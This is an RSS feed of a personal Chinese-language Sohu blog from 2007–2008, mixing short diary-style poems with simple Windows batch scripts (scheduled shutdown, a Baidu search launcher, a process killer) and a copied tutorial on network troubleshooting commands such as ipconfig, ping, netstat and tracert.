<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet href="/xsl/rss.xsl" type="text/xsl" media="screen"?>
<rss version="2.0" 
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:ppp="http://blog.sohu.com/rss/module/ppp/"
	>

	<channel>
		<title>ai你一生！</title>
		<link>http://wlcol.blog.sohu.com/</link>
		<description><![CDATA[一生一世，ai你一世。]]></description>
		<pubDate>Sun, 29 Jun 2008 17:06:04 +0800</pubDate>
		<generator>搜狐博客</generator>
		<ppp:ebi>84ba444792</ppp:ebi>
		<image>
			<title>http://blog.sohu.com</title>
			<url>http://js.pp.sohu.com/ppp/blog/images/common/logo_150_60.gif</url>
			<link>http://blog.sohu.com/</link>
			<width>100</width>
			<height>43</height>
			<description>搜狐博客</description>
		</image>
		<item>
			<title>无题</title>
			<link>http://wlcol.blog.sohu.com/91416130.html</link>
			<comments>http://wlcol.blog.sohu.com/91416130.html#comment</comments>
			<dc:creator>ai你一生！</dc:creator>
			<pubDate>Sun, 29 Jun 2008 17:06:04 +0800</pubDate>
			<guid>http://wlcol.blog.sohu.com/91416130.html</guid>
			<description><![CDATA[<p><font face="楷体_GB2312" size="5">看看上一篇日志到现在已经很久没在这里书写东西了</font></p>
<p><font face="楷体_GB2312" size="5">也不知道是怎么了&nbsp; </font></p>
<p><font face="楷体_GB2312" size="5">现在的我不愿再网络上流淌自己的真实的想法</font></p>
<p><font face="楷体_GB2312" size="5">写的都只是一些无聊在无聊的东西&nbsp; </font></p>
<p><font face="楷体_GB2312" size="5">难道是在自我保护着什么&nbsp; </font></p>
<p><font face="楷体_GB2312" size="5">知道在网络上几乎不存在什么秘密&nbsp; </font></p>
<p><font face="楷体_GB2312" size="5">只要别人想知道 </font></p>
<p><font face="楷体_GB2312" size="5">且有那个技术就一定能知道&nbsp; </font></p>
<p><font face="楷体_GB2312" size="5">在次来到这里也不知道再写些什么</font></p>
<p><font face="楷体_GB2312" size="5">也知道来这的人几乎很少</font></p>
<p><font face="楷体_GB2312" size="5">也许都没人光顾了</font></p>
<p><font face="楷体_GB2312" size="5">呵呵</font></p>
<p><font face="楷体_GB2312" size="5"></font>&nbsp;</p>
<p><font face="楷体_GB2312" size="5">还是自己自娱自乐一下吧</font></p>]]></description>
		</item>
		    
		
		<item>
			<title>批处理--定制系统自动关机</title>
			<link>http://wlcol.blog.sohu.com/79723674.html</link>
			<comments>http://wlcol.blog.sohu.com/79723674.html#comment</comments>
			<dc:creator>ai你一生！</dc:creator>
			<pubDate>Thu, 21 Feb 2008 13:22:17 +0800</pubDate>
			<guid>http://wlcol.blog.sohu.com/79723674.html</guid>
			<description><![CDATA[<p>@echo off<br />title 定制系统自动关机 by:wlcol<br />color 0a<br />cls<br />echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />echo&nbsp;&nbsp;&nbsp; http://wlcol.blog.sohu.com<br />echo&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; By: wlcol<br />echo&nbsp;&nbsp;&nbsp;&nbsp; 2008/02/05&nbsp;&nbsp; 新年特别版<br />echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />echo 显示系统的定制信息<br />echo (如果你的系统为定制任何的命令,将显示&quot;列表上空的&quot;<br />echo 请不要理会直接按任意键.<br />echo 如果你想删除某条定制命令,请输入相应的ID号!)<br />echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />at<br />echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />set /p del=请输入要结束定制关机的ID号:<br />::ntsd -c q -pn %del%<br />at %del% /del<br />cls<br />echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />echo&nbsp;&nbsp;&nbsp; http://wlcol.blog.sohu.com<br />echo&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; By: wlcol<br />echo&nbsp;&nbsp;&nbsp;&nbsp; 2008/02/05&nbsp;&nbsp; 新年特别版<br />echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />set /p run=请按格式输入时间(例: 03:29&nbsp; 17:20)<br />set /p shijian=请输入系统关机预热时间(时间:秒)<br />::ntsd -c q -pn %run%<br />::ntsd -c q -pn %shijian%<br />at %run% shutdown -s -t %shijian%<br />cls<br />echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />echo&nbsp;&nbsp;&nbsp; http://wlcol.blog.sohu.com<br />echo&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; By: wlcol<br />echo&nbsp;&nbsp;&nbsp;&nbsp; 2008/02/05&nbsp;&nbsp; 新年特别版<br />echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />echo 程序将结束..<br />echo&nbsp; . &amp; pause<br />exit</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p><img style="DISPLAY: block; MARGIN: 0px auto 10px; TEXT-ALIGN: center" alt="" src="http://122.img.pp.sohu.com/images/blog/2008/2/21/13/21/118d821dee1.jpg" border="0" /></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p><img style="DISPLAY: block; MARGIN: 0px auto 10px; TEXT-ALIGN: center" alt="" src="http://119.img.pp.sohu.com/images/blog/2008/2/21/13/21/118d822abe4.jpg" border="0" /></p>
<p>&nbsp;</p>
<p><img style="DISPLAY: block; MARGIN: 0px auto 10px; TEXT-ALIGN: center" alt="" src="http://119.img.pp.sohu.com/images/blog/2008/2/21/13/22/118d82305b4.jpg" border="0" /></p>]]></description>
		</item>
		    
		
		<item>
			<title>批处理---简洁搜索</title>
			<link>http://wlcol.blog.sohu.com/55844342.html</link>
			<comments>http://wlcol.blog.sohu.com/55844342.html#comment</comments>
			<dc:creator>ai你一生！</dc:creator>
			<pubDate>Thu, 19 Jul 2007 10:59:33 +0800</pubDate>
			<guid>http://wlcol.blog.sohu.com/55844342.html</guid>
			<description><![CDATA[<p>闲着无聊,弄了个小程序,非常简洁的小搜索引擎.在命令行中调用baidu进行搜索.</p>
<p>将以为文本保存到记事本中,保存为 .bat 为后缀的文件.意为批处理文件.</p>
<p>@echo off<br />title 搜索<br />color 0a<br />cls<br />echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />echo&nbsp;&nbsp;&nbsp; http://wlcol.blog.sohu.com<br />echo&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; By: wlcol<br />echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />set a=<br />set/p a=请输入关键字....<br />start <a href="http://www.baidu.com/s?wd=%a%">http://www.baidu.com/s?wd=%a%</a></p>
<p>如果你喜欢 <a href="http://www.google.com">www.google.com</a>搜索的话,可以将<a href="http://www.baidu.com">www.baidu.com</a>替换掉就可以了.</p>
<p>程序截图:</p>
<p>&nbsp;<img style="DISPLAY: block; MARGIN: 0px auto 10px; TEXT-ALIGN: center" alt="" src="http://117.img.pp.sohu.com/images/blog/2007/7/19/10/22/114756fc421.jpg" border="0" /></p>
<p><img style="DISPLAY: block; MARGIN: 0px auto 10px; TEXT-ALIGN: center" alt="" src="http://118.img.pp.sohu.com/images/blog/2007/7/19/10/21/114756f04e0.jpg" border="0" /></p>]]></description>
		</item>
		    
		
		<item>
			<title>批处理－－结束系统进程</title>
			<link>http://wlcol.blog.sohu.com/55391072.html</link>
			<comments>http://wlcol.blog.sohu.com/55391072.html#comment</comments>
			<dc:creator>ai你一生！</dc:creator>
			<pubDate>Mon, 16 Jul 2007 10:22:11 +0800</pubDate>
			<category>电脑、网络</category>
			<guid>http://wlcol.blog.sohu.com/55391072.html</guid>
			<description><![CDATA[<p>将以下内容ＣＯＰＹ到记事本中，将文件保存为后缀名为 .bat的文件．</p>
<p>．bat　为windows系统批处理文件，批量执行windows系统命令．．</p>
<p>@echo off<br />title 结束系统进程<br />color 0a<br />cls<br />echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />echo&nbsp;&nbsp;&nbsp; http://wlcol.blog.sohu.com<br />echo&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; By: wlcol<br />echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />echo 显示正在使用的系统进程<br />tasklist<br />set /p run=请输入要结束的程序名或PID号..<br />::ntsd -c q -pn %run%<br />taskkill /f /t /im %run%<br />pause&gt;nul<br />exit</p>
<p>程序截图：</p>
<p><img style="DISPLAY: block; MARGIN: 0px auto 10px; TEXT-ALIGN: center" height="361" alt="" src="http://116.img.pp.sohu.com/images/blog/2007/7/16/10/18/11465fb51f5.jpg" width="571" border="0" /></p><img style="DISPLAY: block; MARGIN: 0px auto 10px; WIDTH: 562px; HEIGHT: 287px; TEXT-ALIGN: center" height="278" alt="" src="http://115.img.pp.sohu.com/images/blog/2007/7/16/10/18/114661b62fd.jpg" width="532" border="0" />]]></description>
		</item>
		    
		
		<item>
			<title>流逝...</title>
			<link>http://wlcol.blog.sohu.com/51493190.html</link>
			<comments>http://wlcol.blog.sohu.com/51493190.html#comment</comments>
			<dc:creator>ai你一生！</dc:creator>
			<pubDate>Wed, 20 Jun 2007 09:14:30 +0800</pubDate>
			<category>情感世界</category>
			<guid>http://wlcol.blog.sohu.com/51493190.html</guid>
			<description><![CDATA[<p><font face="楷体_GB2312" size="4">在无意的不经意间</font></p>
<p><font face="楷体_GB2312" size="4">看到了流淌在网络上的文字</font></p>
<p><font face="楷体_GB2312" size="4">原以为一切都是那么美好</font></p>
<p><font face="楷体_GB2312" size="4">可天不随人愿</font></p>
<p><font face="楷体_GB2312" size="4">那一瞬</font></p>
<p><font face="楷体_GB2312" size="4">我的心痛了</font></p>
<p><font face="楷体_GB2312" size="4">一整天的关机让我明白了什么</font></p>
<p><font face="楷体_GB2312" size="4">也心碎了</font></p>
<p><font face="楷体_GB2312" size="4">没有想到会这样</font></p>
<p><font face="楷体_GB2312" size="4">一切的一切我都知道</font></p>
<p><font face="楷体_GB2312" size="4">可它来的太突然了</font></p>
<p><font face="楷体_GB2312" size="4">让我无法接受</font></p>
<p><font face="楷体_GB2312" size="4">...............</font></p>
<p><font face="楷体_GB2312" size="4">累了，该过去的就过去吧。<br />清风吹过、心随而逝！<img style="DISPLAY: block; MARGIN: 0px auto 10px; TEXT-ALIGN: center" alt="" src="http://116.img.pp.sohu.com/images/blog/2007/6/20/9/13/113df70de24.jpg" border="0" /></font></p>
<p><font face="楷体_GB2312" size="4"></font>&nbsp;</p>]]></description>
		</item>
		    
		
		<item>
			<title>网管经常要用的命令</title>
			<link>http://wlcol.blog.sohu.com/50279276.html</link>
			<comments>http://wlcol.blog.sohu.com/50279276.html#comment</comments>
			<dc:creator>ai你一生！</dc:creator>
			<pubDate>Tue, 12 Jun 2007 21:56:36 +0800</pubDate>
			<category>电脑、网络</category>
			<guid>http://wlcol.blog.sohu.com/50279276.html</guid>
			<description><![CDATA[<p><font size="2">网管经常要用的命令</font></p>
<p><font size="2">--------------------------------------------------------------------------------</font></p>
<p><font size="2">如果你玩过路由器的话，就知道路由器里面那些很好玩的命令缩写。&nbsp;<br />例如，&quot;sh int&quot; 的意思是 &quot;show interface&quot;。 <br />现在 Windows 2000 也有了类似界面的工具，叫做 netsh。 </font></p>
<p><font size="2">我们在 Windows 2000 的 cmd shell 下，输入 netsh <br />就出来：netsh&gt; 提示符， <br />输入 int ip 就显示： <br />interface ip&gt; <br />然后输入 dump ，我们就可以看到当前系统的网络配置： </font></p>
<p><font size="2"># ---------------------------------- <br /># Interface IP Configuration <br /># ---------------------------------- <br />pushd interface ip </font></p>
<p><br /><font size="2"># Interface IP Configuration for &quot;Local Area Connection&quot; </font></p>
<p><font size="2">set address name = &quot;Local Area Connection&quot; source = static addr = 192.168.1.168 <br />mask = 255.255.255.0 <br />add address name = &quot;Local Area Connection&quot; addr = 192.1.1.111 mask = 255.255.255.0 <br />set address name = &quot;Local Area Connection&quot; gateway = 192.168.1.100 gwmetric = 1 <br />set dns name = &quot;Local Area Connection&quot; source = static addr = 202.96.209.5 <br />set wins name = &quot;Local Area Connection&quot; source = static addr = none </font></p>
<p><br /><font size="2">popd <br /># End of interface IP configuration </font></p>
<p><font size="2">上面介绍的是通过交互方式操作的一种办法。 <br />我们可以直接输入命令： <br />&quot;netsh interface ip add address &quot;Local Area Connection&quot; 10.0.0.2 <br />255.0.0.0&quot; <br />来添加 IP 地址。 </font></p>
<p><font size="2">如果不知道语法，不要紧的哦！ <br />在提示符下，输入 ? 就可以找到答案了。方便不方便啊？ <br />原来微软的东西里面，也有那么一些让人喜欢的玩意儿。可惜，之至者甚少啊！ </font></p>
<p><br /><font size="2">Windows网络命令行程序 <br />这部分包括： </font></p>
<p><font size="2">使用 ipconfig /all 查看配置 <br />使用 ipconfig /renew 刷新配置 <br />使用 ipconfig 管理 DNS 和 DHCP 类别 ID <br />使用 Ping 测试连接 <br />使用 Arp 解决硬件地址问题 <br />使用 nbtstat 解决 NetBIOS 名称问题 <br />使用 netstat 显示连接统计 <br />使用 tracert 跟踪网络连接 <br />使用 pathping 测试路由器 <br />使用 ipconfig /all 查看配置 <br />发现和解决 TCP/IP 网络问题时，先检查出现问题的计算机上的 TCP/IP 配置。可以 <br />使用 ipconfig 命令获得主机配置信息，包括 IP 地址、子网掩码和默认网关。 </font></p>
<p><font size="2">注意 </font></p>
<p><font size="2">对于 Windows 95 和 Windows 98 的客户机，请使用 winipcfg 命令而不是 ipconfi <br />g 命令。 <br />使用带 /all 选项的 ipconfig 命令时，将给出所有接口的详细配置报告，包括任何 <br />已配置的串行端口。使用 ipconfig /all，可以将命令输出重定向到某个文件，并将 <br />输出粘贴到其他文档中。也可以用该输出确认网络上每台计算机的 TCP/IP 配置，或 <br />者进一步调查 TCP/IP 网络问题。 </font></p>
<p><font size="2">例如，如果计算机配置的 IP 地址与现有的 IP 地址重复，则子网掩码显示为 0.0.0 <br />.0。 </font></p>
<p><font size="2">下面的范例是 ipconfig /all 命令输出，该计算机配置成使用 DHCP 服务器动态配置 <br />TCP/IP，并使用 WINS 和 DNS 服务器解析名称。 </font></p>
<p><font size="2">Windows 2000 IP Configuration </font></p>
<p><font size="2">Node Type.. . . . . . . . : Hybrid <br />IP Routing Enabled.. . . . : No <br />WINS Proxy Enabled.. . . . : No </font></p>
<p><font size="2">Ethernet adapter Local Area Connection: </font></p>
<p><font size="2">Host Name.. . . . . . . . : corp1.microsoft.com <br />DNS Servers . . . . . . . : 10.1.0.200 <br />Description. . . . . . . : 3Com 3C90x Ethernet Adapter <br />Physical Address. . . . . : 00-60-08-3E-46-07 <br />DHCP Enabled.. . . . . . . : Yes <br />Autoconfiguration Enabled.: Yes <br />IP Address. . . . . . . . . : 192.168.0.112 <br />Subnet Mask. . . . . . . . : 255.255.0.0 <br />Default Gateway. . . . . . : 192.168.0.1 <br />DHCP Server. . . . . . . . : 10.1.0.50 <br />Primary WINS Server. . . . : 10.1.0.101 <br />Secondary WINS Server. . . : 10.1.0.102 <br />Lease Obtained.. . . . . . : Wednesday, September 02, 1998 10:32:13 AM <br />Lease Expires.. . . . . . : Friday, September 18, 1998 10:32:13 AM </font></p>
<p><br /><font size="2">如果 TCP/IP 配置没有问题，下一步测试能够连接到 TCP/IP 网络上的其他主机。 </font></p>
<p><font size="2">使用 ipconfig /renew 刷新配置 <br />解决 TCP/IP 网络问题时，先检查遇到问题的计算机上的 TCP/IP 配置。如果计算机 <br />启用 DHCP 并使用 DHCP 服务器获得配置，请使用 ipconfig /renew 命令开始刷新租 <br />约。 </font></p>
<p><font size="2">使用 ipconfig /renew 时，使用 DHCP 的计算机上的所有网卡（除了那些手动配置的 <br />适配器）都尽量连接到 DHCP 服务器，更新现有配置或者获得新配置。 </font></p>
<p><font size="2">也可以使用带 /release 选项的 ipconfig 命令立即释放主机的当前 DHCP 配置。有 <br />关 DHCP 和租用过程的详细信息，请参阅客户机如何获得配置。 </font></p>
<p><font size="2">注意 </font></p>
<p><font size="2">对于启用 DHCP 的 Windows 95 和 Windows 98 客户，请使用 winipcfg 命令的 rel <br />ease 和 renew 选项，而不是 ipconfig /release 和 ipconfig /renew 命令，手动 <br />释放或更新客户的 IP 配置租约。 <br />使用 ipconfig 管理 DNS 和 DHCP 类别 ID <br />也可以使用 ipconfig 命令： </font></p>
<p><font size="2">显示或重置 DNS 缓存。 <br />详细信息，请参阅使用 ipconfig 查看或重置客户解析程序缓存。 </font></p>
<p><font size="2">刷新已注册的 DNS 名称。 <br />详细信息，请参阅使用 ipconfig 更新 DNS 客户注册。 </font></p>
<p><font size="2">显示适配器的 DHCP 类别 ID。 <br />详细信息，请参阅显示客户机上的 DHCP 类别 ID 信息。 </font></p>
<p><font size="2">设置适配器的 DHCP 类别 ID。 <br />详细信息，请参阅设置客户机上的 DHCP 类别 ID 信息。 </font></p>
<p><font size="2">使用 Ping 测试连接 <br />Ping 命令有助于验证 IP 级的连通性。发现和解决问题时，可以使用 Ping 向目标主 <br />机名或 IP 地址发送 ICMP 回应请求。需要验证主机能否连接到 TCP/IP 网络和网络 <br />资源时，请使用 Ping。也可以使用 Ping 隔离网络硬件问题和不兼容配置。 </font></p>
<p><font size="2">通常最好先用 Ping 命令验证本地计算机和网络主机之间的路由是否存在，以及要连 <br />接的网络主机的 IP 地址。Ping 目标主机的 IP 地址看它是否响应，如下： </font></p>
<p><font size="2">ping IP_address </font></p>
<p><font size="2">使用 Ping 时应该执行以下步骤： </font></p>
<p><font size="2">Ping 环回地址验证是否在本地计算机上安装 TCP/IP 以及配置是否正确。 <br />ping 127.0.0.1 </font></p>
<p><font size="2">Ping 本地计算机的 IP 地址验证是否正确地添加到网络。 <br />ping IP_address_of_local_host </font></p>
<p><font size="2">Ping 默认网关的 IP 地址验证默认网关是否运行以及能否与本地网络上的本地主机通 <br />讯。 <br />ping IP_address_of_default_gateway </font></p>
<p><font size="2">Ping 远程主机的 IP 地址验证能否通过路由器通讯。 <br />ping IP_address_of_remote_host </font></p>
<p><font size="2">Ping 命令用 Windows 套接字样式的名称解析将计算机名解析成 IP 地址，所以如果 <br />用地址成功，但是用名称 Ping 失败，则问题出在地址或名称解析上，而不是网络连 <br />通性的问题。详细信息，请参阅使用 Arp 解决硬件地址问题。 </font></p>
<p><font size="2">如果在任何点上都无法成功地使用 Ping，请确认： </font></p>
<p><font size="2">安装和配置 TCP/IP 之后重新启动计算机。 <br />&ldquo;Internet 协议 (TCP/IP) 属性&rdquo;对话框&ldquo;常规&rdquo;选项卡上的本地计算机的 IP 地址 <br />有效而且正确。 <br />启用 IP 路由，并且路由器之间的链路是可用的。 <br />您可以使用 Ping 命令的不同选项来指定要使用的数据包大小、要发送多少数据包、 <br />是否记录用过的路由、要使用的生存时间 (TTL) 值以及是否设置&ldquo;不分段&rdquo;标志。可 <br />以键入 ping -? 查看这些选项。 </font></p>
<p><font size="2">下例说明如何向 IP 地址 172.16.48.10 发送两个 Ping，每个都是 1,450 字节： </font></p>
<p><font size="2">C:&gt;ping -n 2 -l 1450 172.16.48.10 <br />Pinging 172.16.48.10 with 1450 bytes of data: </font></p>
<p><font size="2">Reply from 172.16.48.10:bytes=1450 time&lt;10ms TTL=32 <br />Reply from 172.16.48.10:bytes=1450 time&lt;10ms TTL=32 </font></p>
<p><font size="2">Ping statistics for 157.59.8.1: <br />Packets:Sent = 2, Received = 2, Lost = 0 (0% loss), <br />Approximate roundtrip times in milli-seconds: <br />Minimum = 0ms, Maximum = 10ms, Average = 2ms <br />默认情况下，在显示&ldquo;请求超时&rdquo;之前，Ping 等待 1,000 毫秒（1 秒）的时间让每 <br />个响应返回。如果通过 Ping 探测的远程系统经过长时间延迟的链路，如卫星链路， <br />则响应可能会花更长的时间才能返回。可以使用 -w （等待）选项指定更长时间的超 <br />时。 </font></p>
<p><font size="2">使用 Arp 解决硬件地址问题 <br />&ldquo;地址解析协议 (ARP)&rdquo;允许主机查找同一物理网络上的主机的媒体访问控制地址， <br />如果给出后者的 IP 地址。为使 ARP 更加有效，每个计算机缓存 IP 到媒体访问控制 <br />地址映射消除重复的 ARP 广播请求。 </font></p>
<p><font size="2">可以使用 arp 命令查看和修改本地计算机上的 ARP 表项。arp 命令对于查看 ARP 缓 <br />存和解决地址解析问题非常有用。 </font></p>
<p><font size="2">详细信息，请参阅查看&ldquo;地址解析协议 (ARP)&rdquo;缓存和添加静态 ARP 缓存项目。 </font></p>
<p><font size="2">使用 nbtstat 解决 NetBIOS 名称问题 <br />TCP/IP 上的 NetBIOS (NetBT) 将 NetBIOS 名称解析成 IP 地址。TCP/IP 为 NetBI <br />OS 名称解析提供了很多选项，包括本地缓存搜索、WINS 服务器查询、广播、DNS 服 <br />务器查询以及 Lmhosts 和主机文件搜索。 </font></p>
<p><font size="2">Nbtstat 是解决 NetBIOS 名称解析问题的有用工具。可以使用 nbtstat 命令删除或 <br />更正预加载的项目： </font></p>
<p><font size="2">nbtstat -n 显示由服务器或重定向器之类的程序在系统上本地注册的名称。 <br />nbtstat -c 显示 NetBIOS 名称缓存，包含其他计算机的名称对地址映射。 <br />nbtstat -R 清除名称缓存，然后从 Lmhosts 文件重新加载。 <br />nbtstat -RR 释放在 WINS 服务器上注册的 NetBIOS 名称，然后刷新它们的注册。 <br />nbtstat -a name 对 name 指定的计算机执行 NetBIOS 适配器状态命令。适配器状态 <br />命令将返回计算机的本地 NetBIOS 名称表，以及适配器的媒体访问控制地址。 <br />nbtstat -S 列出当前的 NetBIOS 会话及其状态（包括统计），如下例所示： <br />NetBIOS connection table </font></p>
<p><font size="2">Local name State In/out Remote Host Input Output <br />------------------------------------------------------------------ <br />CORP1 &lt;00&gt; Connected Out CORPSUP1&lt;20&gt; 6MB 5MB <br />CORP1 &lt;00&gt; Connected Out CORPPRINT&lt;20&gt; 108KB 116KB <br />CORP1 &lt;00&gt; Connected Out CORPSRC1&lt;20&gt; 299KB 19KB <br />CORP1 &lt;00&gt; Connected Out CORPEMAIL1&lt;20&gt; 324KB 19KB <br />CORP1 &lt;03&gt; Listening <br />使用 netstat 显示连接统计 <br />可以使用 netstat 命令显示协议统计信息和当前的 TCP/IP 连接。netstat -a 命令 <br />将显示所有连接，而 netstat -r 显示路由表和活动连接。netstat -e 命令将显示 <br />Ethernet 统计信息，而 netstat -s 显示每个协议的统计信息。如果使用 netstat <br />-n，则不能将地址和端口号转换成名称。下面是 netstat 的输出示例： </font></p>
<p><font size="2">C:&gt;netstat -e <br />Interface Statistics </font></p>
<p><font size="2">Received Sent <br />Bytes 3995837940 47224622 <br />Unicast packets 120099 131015 <br />Non-unicast packets 7579544 3823 <br />Discards 0 0 <br />Errors 0 0 <br />Unknown protocols 363054211 </font></p>
<p><font size="2">C:&gt;netstat -a </font></p>
<p><font size="2">Active Connections </font></p>
<p><font size="2">Proto Local Address Foreign Address State <br />TCP CORP1:1572 172.16.48.10:nbsession ESTABLISHED <br />TCP CORP1:1589 172.16.48.10:nbsession ESTABLISHED <br />TCP CORP1:1606 172.16.105.245:nbsession ESTABLISHED <br />TCP CORP1:1632 172.16.48.213:nbsession ESTABLISHED <br />TCP CORP1:1659 172.16.48.169:nbsession ESTABLISHED <br />TCP CORP1:1714 172.16.48.203:nbsession ESTABLISHED <br />TCP CORP1:1719 172.16.48.36:nbsession ESTABLISHED <br />TCP CORP1:1241 172.16.48.101:nbsession ESTABLISHED <br />UDP CORP1:1025 *:* <br />UDP CORP1:snmp *:* <br />UDP CORP1:nbname *:* <br />UDP CORP1:nbdatagram *:* <br />UDP CORP1:nbname *:* <br />UDP CORP1:nbdatagram *:* </font></p>
<p><font size="2">C:&gt;netstat -s <br />IP Statistics </font></p>
<p><font size="2">Packets Received = 5378528 <br />Received Header Errors = 738854 <br />Received Address Errors = 23150 <br />Datagrams Forwarded = 0 <br />Unknown Protocols Received = 0 <br />Received Packets Discarded = 0 <br />Received Packets Delivered = 4616524 <br />Output Requests = 132702 <br />Routing Discards = 157 <br />Discarded Output Packets = 0 <br />Output Packet No Route = 0 <br />Reassembly Required = 0 <br />Reassembly Successful = 0 <br />Reassembly Failures = <br />Datagrams Successfully Fragmented = 0 <br />Datagrams Failing Fragmentation = 0 <br />Fragments Created = 0 </font></p>
<p><font size="2">ICMP Statistics <br />Received Sent <br />Messages 693 4 <br />Errors 0 0 <br />Destination Unreachable 685 0 <br />Time Exceeded 0 0 <br />Parameter Problems 0 0 <br />Source Quenches 0 0 <br />Redirects 0 0 <br />Echoes 4 0 <br />Echo Replies 0 4 <br />Timestamps 0 0 <br />Timestamp Replies 0 0 <br />Address Masks 0 0 <br />Address Mask Replies 0 0 </font></p>
<p><font size="2">TCP Statistics </font></p>
<p><font size="2">Active Opens = 597 <br />Passive Opens = 135 <br />Failed Connection Attempts = 107 <br />Reset Connections = 91 <br />Current Connections = 8 <br />Segments Received = 106770 <br />Segments Sent = 118431 <br />Segments Retransmitted = 461 </font></p>
<p><font size="2">UDP Statistics </font></p>
<p><font size="2">Datagrams Received = 4157136 <br />No Ports = 351928 <br />Receive Errors = 2 <br />Datagrams Sent = 13809 </font></p>
<p><font size="2">使用 tracert 跟踪网络连接 <br />Tracert（跟踪路由）是路由跟踪实用程序，用于确定 IP 数据报访问目标所采取的路 <br />径。Tracert 命令用 IP 生存时间 (TTL) 字段和 ICMP 错误消息来确定从一个主机到 <br />网络上其他主机的路由。 </font></p>
<p><font size="2">Tracert 工作原理 <br />通过向目标发送不同 IP 生存时间 (TTL) 值的&ldquo;Internet 控制消息协议 (ICMP)&rdquo;回 <br />应数据包，Tracert 诊断程序确定到目标所采取的路由。要求路径上的每个路由器在 <br />转发数据包之前至少将数据包上的 TTL 递减 1。数据包上的 TTL 减为 0 时，路由器 <br />应该将&ldquo;ICMP 已超时&rdquo;的消息发回源系统。 </font></p>
<p><font size="2">Tracert 先发送 TTL 为 1 的回应数据包，并在随后的每次发送过程将 TTL 递增 1， <br />直到目标响应或 TTL 达到最大值，从而确定路由。通过检查中间路由器发回的&ldquo;ICM <br />P 已超时&rdquo;的消息确定路由。某些路由器不经询问直接丢弃 TTL 过期的数据包，这在 <br />Tracert 实用程序中看不到。 </font></p>
<p><font size="2">Tracert 命令按顺序打印出返回&ldquo;ICMP 已超时&rdquo;消息的路径中的近端路由器接口列表 <br />。如果使用 -d 选项，则 Tracert 实用程序不在每个 IP 地址上查询 DNS。 </font></p>
<p><font size="2">在下例中，数据包必须通过两个路由器（10.0.0.1 和 192.168.0.1）才能到达主机 <br />172.16.0.99。主机的默认网关是 10.0.0.1，192.168.0.0 网络上的路由器的 IP 地 <br />址是 192.168.0.1。 </font></p>
<p><font size="2">C:&gt;tracert 172.16.0.99 -d <br />Tracing route to 172.16.0.99 over a maximum of 30 hops <br />1 2s 3s 2s 10,0.0,1 <br />2 75 ms 83 ms 88 ms 192.168.0.1 <br />3 73 ms 79 ms 93 ms 172.16.0.99 <br />Trace complete. <br />用 tracert 解决问题 <br />可以使用 tracert 命令确定数据包在网络上的停止位置。下例中，默认网关确定 19 <br />2.168.10.99 主机没有有效路径。这可能是路由器配置的问题，或者是 192.168.10. <br />0 网络不存在（错误的 IP 地址）。 </font></p>
<p><font size="2">C:&gt;tracert 192.168.10.99 </font></p>
<p><font size="2">Tracing route to 192.168.10.99 over a maximum of 30 hops </font></p>
<p><font size="2">1 10.0.0.1 reports:Destination net unreachable. </font></p>
<p><font size="2">Trace complete. </font></p>
<p><font size="2">Tracert 实用程序对于解决大网络问题非常有用，此时可以采取几条路径到达同一个 <br />点。 </font></p>
<p><font size="2">Tracert 命令行选项 <br />Tracert 命令支持多种选项，如下表所示。 </font></p>
<p><font size="2">tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name </font></p>
<p><font size="2">选项 描述 <br />-d 指定不将 IP 地址解析到主机名称。 <br />-h maximum_hops 指定跃点数以跟踪到称为 target_name 的主机的路由。 <br />-j host-list 指定 Tracert 实用程序数据包所采用路径中的路由器接口列表。 <br />-w timeout 等待 timeout 为每次回复所指定的毫秒数。 <br />target_name 目标主机的名称或 IP 地址。 </font></p>
<p><font size="2">详细信息，请参阅使用 tracert 命令跟踪路径。 </font></p>
<p><font size="2">使用 pathping 测试路由器 <br />pathping 命令是一个路由跟踪工具，它将 ping 和 tracert 命令的功能和这两个工 <br />具所不提供的其他信息结合起来。pathping 命令在一段时间内将数据包发送到到达最 <br />终目标的路径上的每个路由器，然后基于数据包的计算机结果从每个跃点返回。由于 <br />命令显示数据包在任何给定路由器或链接上丢失的程度，因此可以很容易地确定可能 <br />导致网络问题的路由器或链接。某些选项是可用的，如下表所示。 </font></p>
<p><font size="2">选项 名称 功能 <br />-n Hostnames 不将地址解析成主机名。 <br />-h Maximum hops 搜索目标的最大跃点数。 <br />-g Host-list 沿着路由列表释放源路由。 <br />-p Period 在 ping 之间等待的毫秒数。 <br />-q Num_queries 每个跃点的查询数。 <br />-w Time-out 为每次回复所等待的毫秒数。 <br />-T Layer 2 tag 将第 2 层优先级标记（例如，对于 IEEE 802.1p）连接到数据包并 <br />将它发送到路径中的每个网络设备。这有助于标识没有正确配置第 2 层优先级的网络 <br />设备。-T 开关用于测试服务质量 (QoS) 连通性。 <br />-R RSVP test Che检查以确定路径中的每个路由器是否支持&ldquo;资源保留协议 (RSVP)&rdquo; <br />，此协议允许主机为数据流保留一定量的带宽。 -R 开关用于测试服务质量 (QoS) 连 <br />通性。 </font></p>
<p><font size="2">默认的跃点数是 30，并且超时前的默认等待时间是 3 秒。默认时间是 250 毫秒，并 <br />且沿着路径对每个路由器进行查询的次数是 100。 </font></p>
